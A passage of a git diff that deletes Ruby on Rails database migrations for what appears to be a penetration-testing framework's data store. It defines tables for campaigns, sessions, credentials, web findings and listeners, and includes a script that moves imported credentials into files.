@@ -1,61 +0,0 @@ - -class AddCampaignsAndTemplates < ActiveRecord::Migration - - def self.up - create_table :campaigns do |t| - t.integer :workspace_id, :null => false - t.string :name, :limit => 512 - # Serialized, stores SMTP/other protocol config options etc. - t.text :prefs - t.integer :status, :default => 0 - t.timestamp :started_at - t.timestamps - end - - create_table :email_templates do |t| - t.string :name, :limit => 512 - t.string :subject, :limit => 1024 - t.text :body - t.integer :parent_id - t.integer :campaign_id - end - create_table :attachments do |t| - t.string :name, :limit => 512 - t.binary :data - t.string :content_type, :limit => 512 - t.boolean :inline, :null => false, :default => true - t.boolean :zip, :null => false, :default => false - end - create_table :attachments_email_templates, :id => false do |t| - t.integer :attachment_id - t.integer :email_template_id - end - - create_table :email_addresses do |t| - t.integer :campaign_id, :null => false - t.string :first_name, :limit => 512 - t.string :last_name, :limit => 512 - t.string :address, :limit => 512 - t.boolean :sent, :null => false, :default => false - t.timestamp :clicked_at - end - - create_table :web_templates do |t| - t.string :name, :limit => 512 - t.string :title, :limit => 512 - t.string :body, :limit => 524288 - t.integer :campaign_id - end - end - - def self.down - drop_table :campaigns - drop_table :email_templates - drop_table :attachments - drop_table :attachments_email_templates - drop_table :email_addresses - drop_table :web_templates - end - -end - diff --git a/data/sql/migrate/20100920012100_add_generate_exe_column.rb b/data/sql/migrate/20100920012100_add_generate_exe_column.rb deleted file mode 100755 index 7b055b268f..0000000000 --- a/data/sql/migrate/20100920012100_add_generate_exe_column.rb +++ /dev/null 
@@ -1,8 +0,0 @@ -class AddGenerateExeColumn < ActiveRecord::Migration - def self.up - add_column :email_templates, :generate_exe, :boolean, :null => false, :default => false - end - def self.down - remove_column :email_templates, :generate_exe - end -end diff --git a/data/sql/migrate/20100926214000_add_template_prefs.rb b/data/sql/migrate/20100926214000_add_template_prefs.rb deleted file mode 100755 index 70b84d0734..0000000000 --- a/data/sql/migrate/20100926214000_add_template_prefs.rb +++ /dev/null @@ -1,11 +0,0 @@ -class AddTemplatePrefs < ActiveRecord::Migration - def self.up - remove_column :email_templates, :generate_exe - add_column :email_templates, :prefs, :text - add_column :web_templates, :prefs, :text - end - def self.down - remove_column :email_templates, :prefs - remove_column :web_templates, :prefs - end -end diff --git a/data/sql/migrate/20101001000000_add_web_tables.rb b/data/sql/migrate/20101001000000_add_web_tables.rb deleted file mode 100755 index e55bf286b5..0000000000 --- a/data/sql/migrate/20101001000000_add_web_tables.rb +++ /dev/null 
@@ -1,57 +0,0 @@ -class AddWebTables < ActiveRecord::Migration - - def self.up - create_table :web_sites do |t| - t.integer :service_id, :null => false - t.timestamps - t.string :vhost, :limit => 2048 - t.text :comments - t.text :options - end - - create_table :web_pages do |t| - t.integer :web_site_id, :null => false - t.timestamps - t.text :path - t.text :query - t.integer :code, :null => false - t.text :cookie - t.text :auth - t.text :ctype - t.timestamp :mtime - t.text :location - t.text :body - t.text :headers - end - - create_table :web_forms do |t| - t.integer :web_site_id, :null => false - t.timestamps - t.text :path - t.string :method, :limit => 1024 - t.text :params - end - - create_table :web_vulns do |t| - t.integer :web_site_id, :null => false - t.timestamps - t.text :path - t.string :method, :limit => 1024 - t.text :params - t.text :pname - t.text :proof - t.integer :risk - t.string :name, :limit => 1024 - end - - end - - def self.down - drop_table :web_sites - drop_table :web_pages - drop_table :web_forms - drop_table :web_vulns - end -end - - diff --git a/data/sql/migrate/20101002000000_add_query.rb b/data/sql/migrate/20101002000000_add_query.rb deleted file mode 100755 index f22d0f2954..0000000000 --- a/data/sql/migrate/20101002000000_add_query.rb +++ /dev/null @@ -1,10 +0,0 @@ -class AddQuery < ActiveRecord::Migration - def self.up - add_column :web_forms, :query, :text - add_column :web_vulns, :query, :text - end - def self.down - remove_column :web_forms, :query - remove_column :web_vulns, :query - end -end diff --git a/data/sql/migrate/20101007000000_add_vuln_info.rb b/data/sql/migrate/20101007000000_add_vuln_info.rb deleted file mode 100755 index 34c1eb3fd9..0000000000 --- a/data/sql/migrate/20101007000000_add_vuln_info.rb +++ /dev/null 
@@ -1,15 +0,0 @@ -class AddVulnInfo < ActiveRecord::Migration - def self.up - add_column :web_vulns, :category, :text - add_column :web_vulns, :confidence, :text - add_column :web_vulns, :description, :text - add_column :web_vulns, :blame, :text - end - def self.down - remove_column :web_forms, :category - remove_column :web_vulns, :confidence - remove_column :web_vulns, :description - remove_column :web_vulns, :blame - end -end - diff --git a/data/sql/migrate/20101008111800_add_clients_to_campaigns.rb b/data/sql/migrate/20101008111800_add_clients_to_campaigns.rb deleted file mode 100755 index 6281f91343..0000000000 --- a/data/sql/migrate/20101008111800_add_clients_to_campaigns.rb +++ /dev/null @@ -1,10 +0,0 @@ - -class AddClientsToCampaigns < ActiveRecord::Migration - def self.up - add_column :clients, :campaign_id, :integer - end - - def self.down - remove_column :clients, :campaign_id - end -end diff --git a/data/sql/migrate/20101009023300_add_campaign_attachments.rb b/data/sql/migrate/20101009023300_add_campaign_attachments.rb deleted file mode 100755 index 6baf770f29..0000000000 --- a/data/sql/migrate/20101009023300_add_campaign_attachments.rb +++ /dev/null @@ -1,15 +0,0 @@ - - -class AddCampaignAttachments < ActiveRecord::Migration - - def self.up - add_column :attachments, :campaign_id, :integer - end - - def self.down - remove_column :attachments, :campaign_id - end - -end - - diff --git a/data/sql/migrate/20101104135100_add_imported_creds.rb b/data/sql/migrate/20101104135100_add_imported_creds.rb deleted file mode 100755 index 92eb12d474..0000000000 --- a/data/sql/migrate/20101104135100_add_imported_creds.rb +++ /dev/null 
@@ -1,17 +0,0 @@ -class AddImportedCreds < ActiveRecord::Migration - - def self.up - create_table :imported_creds do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.string :user, :limit => 512 - t.string :pass, :limit => 512 - t.string :ptype, :limit => 16, :default => "password" - end - end - - def self.down - drop_table :imported_creds - end - -end - diff --git a/data/sql/migrate/20101203000000_fix_web_tables.rb b/data/sql/migrate/20101203000000_fix_web_tables.rb deleted file mode 100755 index 2056369ed7..0000000000 --- a/data/sql/migrate/20101203000000_fix_web_tables.rb +++ /dev/null @@ -1,34 +0,0 @@ -class FixWebTables < ActiveRecord::Migration - - def self.up - change_column :web_pages, :path, :text - change_column :web_pages, :query, :text - change_column :web_pages, :cookie, :text - change_column :web_pages, :auth, :text - change_column :web_pages, :ctype, :text - change_column :web_pages, :location, :text - change_column :web_pages, :path, :text - change_column :web_vulns, :path, :text - change_column :web_vulns, :pname, :text - - add_column :web_pages, :request, :text - add_column :web_vulns, :request, :text - end - - def self.down - change_column :web_pages, :path, :text - change_column :web_pages, :query, :text - change_column :web_pages, :cookie, :text - change_column :web_pages, :auth, :text - change_column :web_pages, :ctype, :text - change_column :web_pages, :location, :text - change_column :web_pages, :path, :text - change_column :web_vulns, :path, :text - change_column :web_vulns, :pname, :text - - remove_column :web_pages, :request - remove_column :web_vulns, :request - end -end - - diff --git a/data/sql/migrate/20101203000001_expand_host_comment.rb b/data/sql/migrate/20101203000001_expand_host_comment.rb deleted file mode 100755 index 1a0bc1bc51..0000000000 --- a/data/sql/migrate/20101203000001_expand_host_comment.rb +++ /dev/null 
@@ -1,12 +0,0 @@ -class ExpandHostComment < ActiveRecord::Migration - - def self.up - change_column :hosts, :comments, :text - end - - def self.down - change_column :hosts, :comments, :string, :limit => 4096 - end -end - - diff --git a/data/sql/migrate/20101206212033_add_limit_to_network_to_workspaces.rb b/data/sql/migrate/20101206212033_add_limit_to_network_to_workspaces.rb deleted file mode 100755 index 7365e14f9d..0000000000 --- a/data/sql/migrate/20101206212033_add_limit_to_network_to_workspaces.rb +++ /dev/null @@ -1,9 +0,0 @@ -class AddLimitToNetworkToWorkspaces < ActiveRecord::Migration - def self.up - add_column :workspaces, :limit_to_network, :boolean, :null => false, :default => false - end - - def self.down - remove_column :workspaces, :limit_to_network - end -end diff --git a/data/sql/migrate/20110112154300_add_module_uuid_to_tasks.rb b/data/sql/migrate/20110112154300_add_module_uuid_to_tasks.rb deleted file mode 100755 index f41bc6a813..0000000000 --- a/data/sql/migrate/20110112154300_add_module_uuid_to_tasks.rb +++ /dev/null @@ -1,9 +0,0 @@ -class AddModuleUuidToTasks < ActiveRecord::Migration - def self.up - add_column :tasks, :module_uuid, :string, :limit => 8 - end - - def self.down - remove_column :tasks, :module_uuid - end -end diff --git a/data/sql/migrate/20110204112800_add_host_tags.rb b/data/sql/migrate/20110204112800_add_host_tags.rb deleted file mode 100755 index d07c885c35..0000000000 --- a/data/sql/migrate/20110204112800_add_host_tags.rb +++ /dev/null 
@@ -1,28 +0,0 @@ -class AddHostTags < ActiveRecord::Migration - - def self.up - - create_table :tags do |t| - t.integer :user_id - t.string :name, :limit => 1024 - t.text :desc - t.boolean :report_summary, :null => false, :default => false - t.boolean :report_detail, :null => false, :default => false - t.boolean :critical, :null => false, :default => false - t.timestamps - end - - create_table :hosts_tags, :id => false do |t| - t.integer :host_id - t.integer :tag_id - end - - end - - def self.down - drop_table :hosts_tags - drop_table :tags - end - -end - diff --git a/data/sql/migrate/20110317144932_add_session_table.rb b/data/sql/migrate/20110317144932_add_session_table.rb deleted file mode 100755 index 15ac8852bb..0000000000 --- a/data/sql/migrate/20110317144932_add_session_table.rb +++ /dev/null 
@@ -1,110 +0,0 @@ -class AddSessionTable < ActiveRecord::Migration - - class Event < ActiveRecord::Base - serialize :info - end - - class SessionEvent < ActiveRecord::Base - belongs_to :session - end - - class Session < ActiveRecord::Base - has_many :events, :class_name => 'AddSessionTable::SessionEvent' - serialize :datastore - end - - def self.up - - create_table :sessions do |t| - t.integer :host_id - - t.string :stype # session type: meterpreter, shell, etc - t.string :via_exploit # module name - t.string :via_payload # payload name - t.string :desc # session description - t.integer :port - t.string :platform # platform type of the remote system - t.string :routes - - t.text :datastore # module's datastore - - t.timestamp :opened_at, :null => false - t.timestamp :closed_at - - t.string :close_reason - end - - create_table :session_events do |t| - t.integer :session_id - - t.string :etype # event type: command, output, upload, download, filedelete - t.binary :command - t.binary :output - t.string :remote_path - t.string :local_path - - t.timestamp :created_at - end - - # - # Migrate session data from events table - # - - close_events = Event.find_all_by_name("session_close") - open_events = Event.find_all_by_name("session_open") - - command_events = Event.find_all_by_name("session_command") - output_events = Event.find_all_by_name("session_output") - upload_events = Event.find_all_by_name("session_upload") - download_events = Event.find_all_by_name("session_download") - - open_events.each do |o| - c = close_events.find { |e| e.info[:session_uuid] == o.info[:session_uuid] } - - s = Session.new( - :host_id => o.host_id, - :stype => o.info[:session_type], - :via_exploit => o.info[:via_exploit], - :via_payload => o.info[:via_payload], - :datastore => o.info[:datastore], - :opened_at => o.created_at - ) - - if c - s.closed_at = c.created_at - s.desc = c.info[:session_info] - else - # couldn't find the corresponding close event - s.closed_at = s.opened_at - s.desc = 
"?" - end - - uuid = o.info[:session_uuid] - - command_events.select { |e| e.info[:session_uuid] == uuid }.each do |e| - s.events.build(:created_at => e.created_at, :etype => "command", :command => e.info[:command] ) - end - - output_events.select { |e| e.info[:session_uuid] == uuid }.each do |e| - s.events.build(:created_at => e.created_at, :etype => "output", :output => e.info[:output] ) - end - - upload_events.select { |e| e.info[:session_uuid] == uuid }.each do |e| - s.events.build(:created_at => e.created_at, :etype => "upload", :local_path => e.info[:local_path], :remote_path => e.info[:remote_path] ) - end - - download_events.select { |e| e.info[:session_uuid] == uuid }.each do |e| - s.events.build(:created_at => e.created_at, :etype => "download", :local_path => e.info[:local_path], :remote_path => e.info[:remote_path] ) - end - - s.events.sort_by(&:created_at) - - s.save! - end - end - - def self.down - drop_table :sessions - drop_table :session_events - end -end diff --git a/data/sql/migrate/20110414180600_add_local_id_to_session_table.rb b/data/sql/migrate/20110414180600_add_local_id_to_session_table.rb deleted file mode 100755 index 7c0e57c505..0000000000 --- a/data/sql/migrate/20110414180600_add_local_id_to_session_table.rb +++ /dev/null @@ -1,11 +0,0 @@ -class AddLocalIdToSessionTable < ActiveRecord::Migration - - def self.up - add_column :sessions, :local_id, :integer - end - - def self.down - remove_column :sessions, :local_id - end - -end diff --git a/data/sql/migrate/20110415175705_add_routes_table.rb b/data/sql/migrate/20110415175705_add_routes_table.rb deleted file mode 100755 index 1eb104f9bf..0000000000 --- a/data/sql/migrate/20110415175705_add_routes_table.rb +++ /dev/null 
@@ -1,18 +0,0 @@ -class AddRoutesTable < ActiveRecord::Migration - - def self.up - create_table :routes do |t| - t.integer :session_id - t.string :subnet - t.string :netmask - end - - remove_column :sessions, :routes - end - - def self.down - drop_table :routes - - add_column :sessions, :routes, :string - end -end diff --git a/data/sql/migrate/20110422000000_convert_binary.rb b/data/sql/migrate/20110422000000_convert_binary.rb deleted file mode 100755 index 4fa3428ad1..0000000000 --- a/data/sql/migrate/20110422000000_convert_binary.rb +++ /dev/null 
@@ -1,72 +0,0 @@ -class ConvertBinary < ActiveRecord::Migration - - - class WebPage < ActiveRecord::Base - serialize :headers - end - - class WebVuln < ActiveRecord::Base - serialize :params - end - - def bfilter(str) - str = str.to_s - str.encoding = 'binary' if str.respond_to?('encoding=') - str.gsub(/[\x00\x7f-\xff]/, '') - end - - def self.up - rename_column :web_pages, :body, :body_text - rename_column :web_pages, :request, :request_text - rename_column :web_vulns, :request, :request_text - rename_column :web_vulns, :proof, :proof_text - - add_column :web_pages, :body, :binary - add_column :web_pages, :request, :binary - add_column :web_vulns, :request, :binary - add_column :web_vulns, :proof, :binary - - WebPage.find(:all).each { |r| r.body = r.body_text; r.save! } - WebPage.find(:all).each { |r| r.request = r.request_text; r.save! } - WebVuln.find(:all).each { |r| r.proof = r.proof_text; r.save! } - WebVuln.find(:all).each { |r| r.request = r.request_text; r.save! } - - remove_column :web_pages, :body_text - remove_column :web_pages, :request_text - remove_column :web_vulns, :request_text - remove_column :web_vulns, :proof_text - - WebPage.connection.schema_cache.clear! - WebPage.reset_column_information - WebVuln.connection.schema_cache.clear! - WebVuln.reset_column_information - end - - def self.down - - rename_column :web_pages, :body, :body_binary - rename_column :web_pages, :request, :request_binary - rename_column :web_vulns, :request, :request_binary - rename_column :web_vulns, :proof, :proof_binary - - add_column :web_pages, :body, :text - add_column :web_pages, :request, :text - add_column :web_vulns, :request, :text - add_column :web_vulns, :proof, :text - - WebPage.find(:all).each { |r| r.body = bfilter(r.body_binary); r.save! } - WebPage.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! } - WebVuln.find(:all).each { |r| r.proof = bfilter(r.proof_binary); r.save! 
} - WebVuln.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! } - - remove_column :web_pages, :body_binary - remove_column :web_pages, :request_binary - remove_column :web_vulns, :request_binary - remove_column :web_vulns, :proof_binary - - WebPage.connection.schema_cache.clear! - WebPage.reset_column_information - WebVuln.connection.schema_cache.clear! - WebVuln.reset_column_information - end -end diff --git a/data/sql/migrate/20110425095900_add_last_seen_to_sessions.rb b/data/sql/migrate/20110425095900_add_last_seen_to_sessions.rb deleted file mode 100755 index 48380af6ae..0000000000 --- a/data/sql/migrate/20110425095900_add_last_seen_to_sessions.rb +++ /dev/null @@ -1,8 +0,0 @@ -class AddLastSeenToSessions < ActiveRecord::Migration - def self.up - add_column :sessions, :last_seen, :timestamp - end - def self.down - remove_column :sessions, :last_seen - end -end diff --git a/data/sql/migrate/20110513143900_track_successful_exploits.rb b/data/sql/migrate/20110513143900_track_successful_exploits.rb deleted file mode 100755 index 7c55105fe8..0000000000 --- a/data/sql/migrate/20110513143900_track_successful_exploits.rb +++ /dev/null @@ -1,31 +0,0 @@ -class TrackSuccessfulExploits < ActiveRecord::Migration - - - class ExploitedHost < ActiveRecord::Base - end - - class Vuln < ActiveRecord::Base - end - - def self.up - add_column :vulns, :exploited_at, :timestamp - - # Migrate existing exploited_hosts entries - - ExploitedHost.find(:all).select {|x| x.name}.each do |exploited_host| - next unless(exploited_host.name =~ /^(exploit|auxiliary)\//) - vulns = Vuln.find_all_by_name_and_host_id(exploited_host.name, exploited_host.host_id) - next if vulns.empty? - vulns.each do |vuln| - vuln.exploited_at = exploited_host.updated_at - vuln.save - end - end - - end - - def self.down - remove_column :vulns, :exploited_at - end - -end 
diff --git a/data/sql/migrate/20110517160800_rename_and_prune_nessus_vulns.rb b/data/sql/migrate/20110517160800_rename_and_prune_nessus_vulns.rb deleted file mode 100755 index e1b8955b7f..0000000000 --- a/data/sql/migrate/20110517160800_rename_and_prune_nessus_vulns.rb +++ /dev/null @@ -1,26 +0,0 @@ -class RenameAndPruneNessusVulns < ActiveRecord::Migration - - class Vuln < ActiveRecord::Base - end - - # No table changes, just vuln renaming to drop the NSS id - # from those vulns that have it and a descriptive name. - def self.up - Vuln.find(:all).each do |v| - if v.name =~ /^NSS-0?\s*$/ - v.delete - next - end - next unless(v.name =~ /^NSS-[0-9]+\s(.+)/) - new_name = $1 - next if(new_name.nil? || new_name.strip.empty?) - v.name = new_name - v.save! - end - end - - def self.down - say "Cannot un-rename and un-prune NSS vulns for migration 20110517160800." - end - -end diff --git a/data/sql/migrate/20110527000000_add_task_id_to_reports_table.rb b/data/sql/migrate/20110527000000_add_task_id_to_reports_table.rb deleted file mode 100755 index 5af2d46704..0000000000 --- a/data/sql/migrate/20110527000000_add_task_id_to_reports_table.rb +++ /dev/null @@ -1,11 +0,0 @@ -class AddTaskIdToReportsTable < ActiveRecord::Migration - - def self.up - add_column :reports, :task_id, :integer - end - - def self.down - remove_column :reports, :task_id - end - -end diff --git a/data/sql/migrate/20110527000001_add_api_keys_table.rb b/data/sql/migrate/20110527000001_add_api_keys_table.rb deleted file mode 100755 index 13e6ecedd0..0000000000 --- a/data/sql/migrate/20110527000001_add_api_keys_table.rb +++ /dev/null @@ -1,12 +0,0 @@ -class AddApiKeysTable < ActiveRecord::Migration - def self.up - create_table :api_keys do |t| - t.text :token - t.timestamps - end - end - def self.down - drop_table :api_keys - end -end - diff --git a/data/sql/migrate/20110606000001_add_macros_table.rb b/data/sql/migrate/20110606000001_add_macros_table.rb deleted file mode 100755 index bfb8ef6085..0000000000 
--- a/data/sql/migrate/20110606000001_add_macros_table.rb +++ /dev/null @@ -1,16 +0,0 @@ -class AddMacrosTable < ActiveRecord::Migration - def self.up - create_table :macros do |t| - t.timestamps - t.text :owner - t.text :name - t.text :description - t.binary :actions - t.binary :prefs - end - end - def self.down - drop_table :macros - end -end - diff --git a/data/sql/migrate/20110610085000_move_old_imported_creds_to_new_files.rb b/data/sql/migrate/20110610085000_move_old_imported_creds_to_new_files.rb deleted file mode 100755 index e057c2ca20..0000000000 --- a/data/sql/migrate/20110610085000_move_old_imported_creds_to_new_files.rb +++ /dev/null 
@@ -1,127 +0,0 @@ -class MoveOldImportedCredsToNewFiles < ActiveRecord::Migration - - class ImportedCred < ActiveRecord::Base - end - - class CredFile < ActiveRecord::Base - end - - class Workspace < ActiveRecord::Base - end - - class << self - - def find_or_create_cred_path - cred_files_dir = nil - msf_base = Msf::Config.install_root - pro_base = File.expand_path(File.join(msf_base, "..", "engine", "lib", "pro")) - if File.directory? pro_base - cred_files_dir = File.expand_path(File.join(msf_base, "..", "cred_files")) - FileUtils.mkdir_p(cred_files_dir) unless File.exists?(cred_files_dir) - if File.directory?(cred_files_dir) and File.writable?(cred_files_dir) - end - end - return cred_files_dir - end - - def find_all_imported_creds_by_workspace - valid_ptypes = ["smb_hash", "userpass", "password"] - valid_workspaces = Workspace.all.map {|w| w.id} - creds = {} - ImportedCred.all.each do |cred| - next unless cred.ptype - next unless valid_ptypes.include? cred.ptype - next unless cred.workspace_id - next unless valid_workspaces.include? cred.workspace_id - creds[cred.workspace_id] ||= [] - creds[cred.workspace_id] << cred - end - return creds - end - - def sort_creds_into_file_types(old_creds) - files = {} - old_creds.each do |wid,creds| - filedata = {} - creds.each do |cred| - filedata[cred.ptype] ||= [] - case cred.ptype - when "smb_hash", "userpass" - filedata[cred.ptype] << ("%s %s" % [cred.user,cred.pass]) - when "password" - filedata[cred.ptype] << cred.pass.to_s - end - files[wid] = filedata - end - end - return files - end - - def write_creds_to_files(old_creds,cred_path) - file_data_to_write = sort_creds_into_file_types(old_creds) - files_written = [] - file_data_to_write.each do |wid, fdata_hash| - fdata_hash.each do |ftype,cred_data| - next unless cred_data - next if cred_data.empty? 
- fname = File.join(cred_path,"creds_#{wid}_#{ftype}-#{Time.now.utc.to_i}.txt") - fdata = cred_data.join("\n") - fh = File.open(fname, "wb") - begin - fh.write fdata - fh.flush - ensure - fh.close - end - files_written << fname - end - end - return files_written - end - - def register_new_files(new_files) - successful_count = 0 - new_files.each do |fname| - next unless File.split(fname).last =~ /^creds_([0-9]+)_(userpass|password|smb_hash)\-[0-9]+\.txt$/ - wid = $1 - next unless Workspace.find(wid) - ftype = $2 - actual_ftype = case ftype - when "smb_hash", "userpass" - "userpass" # They're treated the same - when "password" - "pass" - end - next unless actual_ftype - say "Registering credential file '%s' for workspace %d as type '%s'" % [fname,wid,actual_ftype] - cred_file = CredFile.new - cred_file.workspace_id = wid - cred_file.created_by = "" - cred_file.path = fname - cred_file.name = "#{ftype}.txt" - cred_file.desc = "Migrated #{ftype} credentials" - cred_file.ftype = actual_ftype - if cred_file.save - successful_count += 1 - say "Successfully imported #{ftype} credentials for workspace #{wid}" - end - end - successful_count - end - - end - - def self.up - cred_path = find_or_create_cred_path - if cred_path - old_imported_creds = find_all_imported_creds_by_workspace - new_files = write_creds_to_files(old_imported_creds,cred_path) - successful_count = register_new_files(new_files) - end - end - - # Sorry, can't get the old data back. - def self.down - end - -end diff --git a/data/sql/migrate/20110622000000_add_settings_to_tasks_table.rb b/data/sql/migrate/20110622000000_add_settings_to_tasks_table.rb deleted file mode 100755 index ee9ee21070..0000000000 --- a/data/sql/migrate/20110622000000_add_settings_to_tasks_table.rb +++ /dev/null @@ -1,12 +0,0 @@ -class AddSettingsToTasksTable < ActiveRecord::Migration - - def self.up - add_column :tasks, :settings, :binary - end - - def self.down - remove_column :tasks, :settings - end - -end - 
diff --git a/data/sql/migrate/20110624000001_add_listeners_table.rb b/data/sql/migrate/20110624000001_add_listeners_table.rb deleted file mode 100755 index c541be2131..0000000000 --- a/data/sql/migrate/20110624000001_add_listeners_table.rb +++ /dev/null @@ -1,19 +0,0 @@ -class AddListenersTable < ActiveRecord::Migration - def self.up - create_table :listeners do |t| - t.timestamps - t.integer :workspace_id, :null => false, :default => 1 - t.integer :task_id - t.boolean :enabled, :default => true - t.text :owner - t.text :payload - t.text :address - t.integer :port - t.binary :options - end - end - def self.down - drop_table :listeners - end -end - diff --git a/data/sql/migrate/20110625000001_add_macro_to_listeners_table.rb b/data/sql/migrate/20110625000001_add_macro_to_listeners_table.rb deleted file mode 100755 index 283d102105..0000000000 --- a/data/sql/migrate/20110625000001_add_macro_to_listeners_table.rb +++ /dev/null @@ -1,12 +0,0 @@ -class AddMacroToListenersTable < ActiveRecord::Migration - - def self.up - add_column :listeners, :macro, :text - end - - def self.down - remove_column :listeners, :macro - end - -end - diff --git a/data/sql/migrate/20110630000001_add_nexpose_consoles_table.rb b/data/sql/migrate/20110630000001_add_nexpose_consoles_table.rb deleted file mode 100755 index 037af40ae1..0000000000 --- a/data/sql/migrate/20110630000001_add_nexpose_consoles_table.rb +++ /dev/null @@ -1,21 +0,0 @@ -class AddNexposeConsolesTable < ActiveRecord::Migration - def self.up - create_table :nexpose_consoles do |t| - t.timestamps - t.boolean :enabled, :default => true - t.text :owner - t.text :address - t.integer :port, :default => 3780 - t.text :username - t.text :password - t.text :status - t.text :version - t.text :cert - t.binary :cached_sites - end - end - def self.down - drop_table :nexpose_consoles - end -end - 
diff --git a/data/sql/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb b/data/sql/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb deleted file mode 100755 index 9411724344..0000000000 --- a/data/sql/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb +++ /dev/null @@ -1,12 +0,0 @@ -class AddNameToNexposeConsolesTable < ActiveRecord::Migration - - def self.up - add_column :nexpose_consoles, :name, :text - end - - def self.down - remove_column :nexpose_consoles, :name - end - -end - diff --git a/data/sql/migrate/20110717000001_add_profiles_table.rb b/data/sql/migrate/20110717000001_add_profiles_table.rb deleted file mode 100755 index c0b8831bf1..0000000000 --- a/data/sql/migrate/20110717000001_add_profiles_table.rb +++ /dev/null @@ -1,15 +0,0 @@ -class AddProfilesTable < ActiveRecord::Migration - def self.up - create_table :profiles do |t| - t.timestamps - t.boolean :active, :default => true - t.text :name - t.text :owner - t.binary :settings - end - end - def self.down - drop_table :profiles - end -end - diff --git a/data/sql/migrate/20110727163801_expand_cred_ptype_column.rb b/data/sql/migrate/20110727163801_expand_cred_ptype_column.rb deleted file mode 100755 index b5fce6fd8f..0000000000 --- a/data/sql/migrate/20110727163801_expand_cred_ptype_column.rb +++ /dev/null @@ -1,9 +0,0 @@ -class ExpandCredPtypeColumn < ActiveRecord::Migration - def self.up - change_column :creds, :ptype, :string, :limit => 256 - end - def self.down - change_column :creds, :ptype, :string, :limit => 16 - end -end - diff --git a/data/sql/migrate/20110730000001_add_initial_indexes.rb b/data/sql/migrate/20110730000001_add_initial_indexes.rb deleted file mode 100755 index 4085f64843..0000000000 --- a/data/sql/migrate/20110730000001_add_initial_indexes.rb +++ /dev/null 
@@ -1,85 +0,0 @@ -class AddInitialIndexes < ActiveRecord::Migration - def self.up - - - add_index :hosts, :address - add_index :hosts, :address6 - add_index :hosts, :name - add_index :hosts, :state - add_index :hosts, :os_name - add_index :hosts, :os_flavor - add_index :hosts, :purpose - - # Removed (conditionally dropped in the next migration) - # add_index :hosts, :comments - - add_index :services, :port - add_index :services, :proto - add_index :services, :state - add_index :services, :name - - # Removed (conditionally dropped in the next migration) - # add_index :services, :info - - add_index :notes, :ntype - - add_index :vulns, :name - - # Removed (conditionally dropped in the next migration) - # add_index :vulns, :info - - add_index :refs, :name - - add_index :web_sites, :vhost - add_index :web_sites, :comments - add_index :web_sites, :options - - add_index :web_pages, :path - add_index :web_pages, :query - - add_index :web_forms, :path - - add_index :web_vulns, :path - add_index :web_vulns, :method - add_index :web_vulns, :name - end - - def self.down - - remove_index :hosts, :address - remove_index :hosts, :address6 - remove_index :hosts, :name - remove_index :hosts, :state - remove_index :hosts, :os_name - remove_index :hosts, :os_flavor - remove_index :hosts, :purpose - remove_index :hosts, :comments - - remove_index :services, :port - remove_index :services, :proto - remove_index :services, :state - remove_index :services, :name - remove_index :services, :info - - remove_index :notes, :ntype - - remove_index :vulns, :name - remove_index :vulns, :info - - remove_index :refs, :name - - remove_index :web_sites, :vhost - remove_index :web_sites, :comments - remove_index :web_sites, :options - - remove_index :web_pages, :path - remove_index :web_pages, :query - - remove_index :web_forms, :path - - remove_index :web_vulns, :path - remove_index :web_vulns, :method - remove_index :web_vulns, :name - end -end - 
diff --git a/data/sql/migrate/20110812000001_prune_indexes.rb b/data/sql/migrate/20110812000001_prune_indexes.rb deleted file mode 100755 index 54b681f273..0000000000 --- a/data/sql/migrate/20110812000001_prune_indexes.rb +++ /dev/null @@ -1,23 +0,0 @@ -class PruneIndexes < ActiveRecord::Migration - def self.up - - if indexes(:hosts).map{|x| x.columns }.flatten.include?("comments") - remove_index :hosts, :comments - end - - if indexes(:services).map{|x| x.columns }.flatten.include?("info") - remove_index :services, :info - end - - if indexes(:vulns).map{|x| x.columns }.flatten.include?("info") - remove_index :vulns, :info - end - end - - def self.down - add_index :hosts, :comments - add_index :services, :info - add_index :vulns, :info - end -end - diff --git a/data/sql/migrate/20110922000000_expand_notes.rb b/data/sql/migrate/20110922000000_expand_notes.rb deleted file mode 100755 index 4e77303fa0..0000000000 --- a/data/sql/migrate/20110922000000_expand_notes.rb +++ /dev/null @@ -1,9 +0,0 @@ -class ExpandNotes < ActiveRecord::Migration - def self.up - change_column :notes, :data, :text - end - def self.down - change_column :notes, :data, :string, :limit => 65536 - end -end - diff --git a/data/sql/migrate/20110928101300_add_mod_ref_table.rb b/data/sql/migrate/20110928101300_add_mod_ref_table.rb deleted file mode 100755 index 24f16d642f..0000000000 --- a/data/sql/migrate/20110928101300_add_mod_ref_table.rb +++ /dev/null @@ -1,17 +0,0 @@ -# Probably temporary, a spot to stash module names and their associated refs -# Don't count on it being populated at any given moment. -class AddModRefTable < ActiveRecord::Migration - - def self.up - create_table :mod_refs do |t| - t.string :module, :limit => 1024 - t.string :mtype, :limit => 128 - t.text :ref - end - end - - def self.down - drop_table :mod_refs - end - -end 
diff --git a/data/sql/migrate/20111011110000_add_display_name_to_reports_table.rb b/data/sql/migrate/20111011110000_add_display_name_to_reports_table.rb deleted file mode 100755 index f0c54fed98..0000000000 --- a/data/sql/migrate/20111011110000_add_display_name_to_reports_table.rb +++ /dev/null @@ -1,24 +0,0 @@ -class AddDisplayNameToReportsTable < ActiveRecord::Migration - - class Report < ActiveRecord::Base - end - - def self.up - - add_column :reports, :name, :string, :limit => 63 - - # Migrate to have a default name. - - Report.find(:all).each do |report| - rtype = report.rtype.to_s =~ /^([A-Z0-9]+)\x2d/i ? $1 : "AUDIT" - default_name = rtype[0,57].downcase.capitalize + "-" + report.id.to_s[0,5] - report.name = default_name - report.save - end - end - - def self.down - remove_column :reports, :name - end - -end diff --git a/data/sql/migrate/20111203000000_inet_columns.rb b/data/sql/migrate/20111203000000_inet_columns.rb deleted file mode 100755 index 6e86654bc5..0000000000 --- a/data/sql/migrate/20111203000000_inet_columns.rb +++ /dev/null @@ -1,13 +0,0 @@ -class InetColumns < ActiveRecord::Migration - - def self.up - change_column :hosts, :address, 'INET using address::INET' - remove_column :hosts, :address6 - end - - def self.down - change_column :hosts, :address, :text - add_column :hosts, :address6, :text - end - -end diff --git a/data/sql/migrate/20111204000000_more_inet_columns.rb b/data/sql/migrate/20111204000000_more_inet_columns.rb deleted file mode 100755 index 56adf64625..0000000000 --- 